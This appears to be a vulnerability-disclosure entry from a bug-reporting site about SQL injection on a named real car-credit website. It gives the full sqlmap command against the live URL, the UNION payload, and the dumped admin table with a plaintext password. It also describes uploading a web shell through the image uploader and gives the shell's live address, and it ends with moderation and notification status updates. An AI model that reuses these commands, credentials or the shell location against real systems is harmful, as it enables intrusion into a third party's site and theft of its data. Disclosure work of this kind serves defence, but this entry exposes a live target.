Detailed information
Have SQL injection on site.
By using this weakness possible Steal sensitive information from the site (Passwords, site structure, etc.)
[email protected]:~# sqlmap -u http://carkredit.az/az/kurumsal-detay.php?i=1 -D u765618212_cark -T kullanici -C kad,kpasswd --dump
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: i=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkxzq','MeUyGPiVljpzydkvUNiRMvMWFVkLUpITzwPBcBeR'),'qzzqq')-- VhEt
---
[06:56:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.32
back-end DBMS: MySQL 5 (MariaDB fork)
[06:56:56] [INFO] fetching entries of column(s) 'kad, kpasswd' for table 'kullanici' in database 'u765618212_cark'
[06:56:56] [INFO] the SQL query used returns 1 entries
[06:56:56] [INFO] resumed: "[email protected]","adminck"
[06:56:56] [INFO] analyzing table dump for possible password hashes
Database: u765618212_cark
Table: kullanici
[1 entry]
+-------------------+---------+
| kad | kpasswd |
+-------------------+---------+
| [email protected] | adminck |
+-------------------+---------+
When uploading a site image an admin page / panel, it is possible to upload a shell by changing the file name extension of the Burp Suite tool. Apart from entering panel1, no password is required. The site was loaded with a shell for test purposes, but the site was not damaged.
Shell address - http://carkredit.az/images/kurumsal/bhp.php
Comments
-
06 March 2018, 10:53
Vulnerability status
Have not any information from source -
17 January 2018, 09:46
Vulnerability status
Sended e-mail to source about vulnerability -
16 January 2018, 07:44
Added point to Vulnerability
Moderator gave 8 point from 10 to vulnerability -
16 January 2018, 07:43
Vulnerability status
Confirmed by Moderator -
15 January 2018, 16:06
Vulnerability added
Vulnerability added to BUGemot